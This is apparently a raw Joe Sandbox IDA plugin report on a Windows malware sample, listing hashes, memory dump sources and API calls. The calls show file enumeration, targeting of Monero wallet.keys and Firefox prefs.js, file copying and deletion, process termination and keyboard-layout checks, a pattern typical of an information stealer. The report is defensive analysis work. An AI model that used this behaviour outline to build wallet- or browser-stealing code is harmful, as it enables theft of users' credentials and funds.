                            • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                            • Instruction ID: 6227cc90db829e050880fe4712cd3b440a472f6d6f911fc65cbd049675246695
                            • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                            • Instruction Fuzzy Hash: 58E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E616B0,00E60D97), ref: 00E4F81E
                            • StrCmpCA.SHLWAPI(?,00E616B4), ref: 00E4F86F
                            • StrCmpCA.SHLWAPI(?,00E616B8), ref: 00E4F885
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4FBB1
                            • FindClose.KERNEL32(000000FF), ref: 00E4FBC3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: 9b94e0ec74765e20de383137830ad7673350ca926ba4a0113ca79a8befd5f2e3
                            • Instruction ID: 42a983b993422a7be22bbf4fd81fef098a4b9dffa40fd044ee61a83676d1150e
                            • Opcode Fuzzy Hash: 9b94e0ec74765e20de383137830ad7673350ca926ba4a0113ca79a8befd5f2e3
                            • Instruction Fuzzy Hash: CCB113719001189BCB24FF64DD96EEE73B9AF54301F045AB8E90A76191EF309B4CCB92
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E6523C,?,?,?,00E652E4,?,?,00000000,?,00000000), ref: 00E41963
                            • StrCmpCA.SHLWAPI(?,00E6538C), ref: 00E419B3
                            • StrCmpCA.SHLWAPI(?,00E65434), ref: 00E419C9
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E41D80
                            • DeleteFileA.KERNEL32(00000000), ref: 00E41E0A
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E41E60
                            • FindClose.KERNEL32(000000FF), ref: 00E41E72
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: 2fed91634049c3095efd1517702299088426ad8ead7908527e38368b6ba2e975
                            • Instruction ID: 08979b04148d7ac71603b67b5a444de512062698e792192568b5d475a162459a
                            • Opcode Fuzzy Hash: 2fed91634049c3095efd1517702299088426ad8ead7908527e38368b6ba2e975
                            • Instruction Fuzzy Hash: 9512F0719101189BCF59FB60DC66AEEB3B9AF54301F445AE9E90672091EF306B8CCF91
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E60C32), ref: 00E4DF5E
                            • StrCmpCA.SHLWAPI(?,00E615C0), ref: 00E4DFAE
                            • StrCmpCA.SHLWAPI(?,00E615C4), ref: 00E4DFC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4E4E0
                            • FindClose.KERNEL32(000000FF), ref: 00E4E4F2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: fed9bd99313b22fb74b15341204e5230f246d8fc4635eff6376475e79692d024
                            • Instruction ID: 8c5fdac425f6e6e1d3ba08bf9dffc4ad7b0d4e098857a8dcaafd899d272a1501
                            • Opcode Fuzzy Hash: fed9bd99313b22fb74b15341204e5230f246d8fc4635eff6376475e79692d024
                            • Instruction Fuzzy Hash: 3BF1EF719101189BCB65FB60DDA5EEEB379AF14301F446AE9E41A72091EF306B8CCF91
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E615A8,00E60BAF), ref: 00E4DBEB
                            • StrCmpCA.SHLWAPI(?,00E615AC), ref: 00E4DC33
                            • StrCmpCA.SHLWAPI(?,00E615B0), ref: 00E4DC49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4DECC
                            • FindClose.KERNEL32(000000FF), ref: 00E4DEDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 20ba047c9c8bb3c5f7114977cd2892c2b9e2b0d4194f101255b5d54a5e45258b
                            • Instruction ID: 3ef204cb27321ce4e455dc4a1806b00062e4edc8023ff43bfef05f5b436ff57c
                            • Opcode Fuzzy Hash: 20ba047c9c8bb3c5f7114977cd2892c2b9e2b0d4194f101255b5d54a5e45258b
                            • Instruction Fuzzy Hash: 98912172A001089BCB14FB70ED969ED73BDAB94341F045AB8FD1676185EE349B4CCB92
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E59905
                            • Process32First.KERNEL32(00E49FDE,00000128), ref: 00E59919
                            • Process32Next.KERNEL32(00E49FDE,00000128), ref: 00E5992E
                            • StrCmpCA.SHLWAPI(?,00E49FDE), ref: 00E59943
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E5995C
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E5997A
                            • CloseHandle.KERNEL32(00000000), ref: 00E59987
                            • CloseHandle.KERNEL32(00E49FDE), ref: 00E59993
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 2696918072-0
                            • Opcode ID: 4a32e95e5d09b74466dd09cb3b83deb0c98339d898ec238c12f64980e774ff59
                            • Instruction ID: 7e8c7d16f550cc524168eda240ddc2e6b9ac965c0dabbdcff8252862a637b924
                            • Opcode Fuzzy Hash: 4a32e95e5d09b74466dd09cb3b83deb0c98339d898ec238c12f64980e774ff59
                            • Instruction Fuzzy Hash: D211EC75A00218EBDB24DFA4DD48BDDF7B9AB88705F00459CF519A6284DB749A84CF90
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: o}{$ ik$3>N\$S51;$[7bc$o?=$6}$['
                            • API String ID: 0-2791657503
                            • Opcode ID: fc49d410093f98705597b359761f045e7e60018b2e8bbcf6b4270de14057f0d3
                            • Instruction ID: fa1a2111647f537cc450412a17d5e6e3a3954e7ee12d7c8c6fc4e54300f73485
                            • Opcode Fuzzy Hash: fc49d410093f98705597b359761f045e7e60018b2e8bbcf6b4270de14057f0d3
                            • Instruction Fuzzy Hash: 3DB206F3A0C204AFE3046E2DEC8567ABBE9EFD4360F16463DE6C4C7744EA3558058696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ._j]$9ty$H?=$Q}w$R~$aKO!$g;|$t@O{
                            • API String ID: 0-2911646462
                            • Opcode ID: b730aa2f57eacd9ae85f9ecc3f5926960bfcf09115d6d0eb5c2633fdedbc80ef
                            • Instruction ID: db0f056fd8dc2beecc54c100857b0807157bf964ee8239462449a6423a86f5ca
                            • Opcode Fuzzy Hash: b730aa2f57eacd9ae85f9ecc3f5926960bfcf09115d6d0eb5c2633fdedbc80ef
                            • Instruction Fuzzy Hash: 14B207F3A0C214AFE3046E2DEC8567AFBE9EB94720F16463DEAC4C7744E63558018796
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • GetKeyboardLayoutList.USER32(00000000,00000000,00E605B7), ref: 00E57D71
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00E57D89
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00E57D9D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E57DF2
                            • LocalFree.KERNEL32(00000000), ref: 00E57EB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 7d0ab7dcec5e9ec5eab2cc96a5ee73dba2714e98d1bec2bf65006eadd6cf6110
                            • Instruction ID: dc747595ddc54eafdd600ffb20ef189cec09051e8da45cfc106fae34f1b6d2c8
                            • Opcode Fuzzy Hash: 7d0ab7dcec5e9ec5eab2cc96a5ee73dba2714e98d1bec2bf65006eadd6cf6110
                            • Instruction Fuzzy Hash: DD414271940218ABCB24DB94DC99BEEB7B4FF44701F1046E9E50A72281DB746F88CFA1
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E60D79), ref: 00E4E5A2
                            • StrCmpCA.SHLWAPI(?,00E615F0), ref: 00E4E5F2
                            • StrCmpCA.SHLWAPI(?,00E615F4), ref: 00E4E608
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4ECDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 5ae87179fb2581b245fe0c7565de9ae4671a0886f75e68cea1ef5c11f75779c3
                            • Instruction ID: 2617c9df03b3ace8f1ce823c19044904d9d7fd43f0602d626c61ec07defc2bd9
                            • Opcode Fuzzy Hash: 5ae87179fb2581b245fe0c7565de9ae4671a0886f75e68cea1ef5c11f75779c3
                            • Instruction Fuzzy Hash: 101224716101185BCB14FB60DDA6AEDB3B9AF54301F485AF9F90A72191EE306B4CCF92
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E4A23F
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00E44F3E,00000000,?), ref: 00E4A251
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E4A27A
                            • LocalFree.KERNEL32(?,?,?,?,00E44F3E,00000000,?), ref: 00E4A28F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: >O
                            • API String ID: 4291131564-1870091082
                            • Opcode ID: 64a565fb0cdc6a9a3ab64dcc3d6d12e53b5449ee655cf586fbe9ff05d965081e
                            • Instruction ID: f7b55182a8df51f916d3826f8bc3baf9e720900432b0b424849ad367d9ef63b8
                            • Opcode Fuzzy Hash: 64a565fb0cdc6a9a3ab64dcc3d6d12e53b5449ee655cf586fbe9ff05d965081e
                            • Instruction Fuzzy Hash: 7E11D474240308AFEB15CFA4D895FAA77B9EB88B14F208458FD159B3D0C7B2A941CB50
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: "~{$Ql%I$`7Sm$b}/$m}
                            • API String ID: 0-2006350172
                            • Opcode ID: bb517060438c5ac1d2515f78ce3e83856b9313b9a9e4e318c83f41b11f81004d
                            • Instruction ID: 6dfa87953942e541823148ac76563692238d2e9c794385863690bb0887f0e638
                            • Opcode Fuzzy Hash: bb517060438c5ac1d2515f78ce3e83856b9313b9a9e4e318c83f41b11f81004d
                            • Instruction Fuzzy Hash: 22B2E4F3A082049FE3046E2DEC8577AFBE9EF94720F1A493DEAC4C7744E63558058696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: \u$\u${${$}$}
                            • API String ID: 0-582841131
                            • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                            • Instruction ID: 0a98aaa753290ca2094f5f71be59221da8c3a58bd9a54b3bce09894828d44898
                            • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                            • Instruction Fuzzy Hash: AE418212D19BD5C5CB058BB444A02EEBFB22FD6210F6D42EAC4DD1F382C774914AD3A5
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E4C971
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E4C97C
                            • lstrcat.KERNEL32(?,00E60B47), ref: 00E4CA43
                            • lstrcat.KERNEL32(?,00E60B4B), ref: 00E4CA57
                            • lstrcat.KERNEL32(?,00E60B4E), ref: 00E4CA78
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
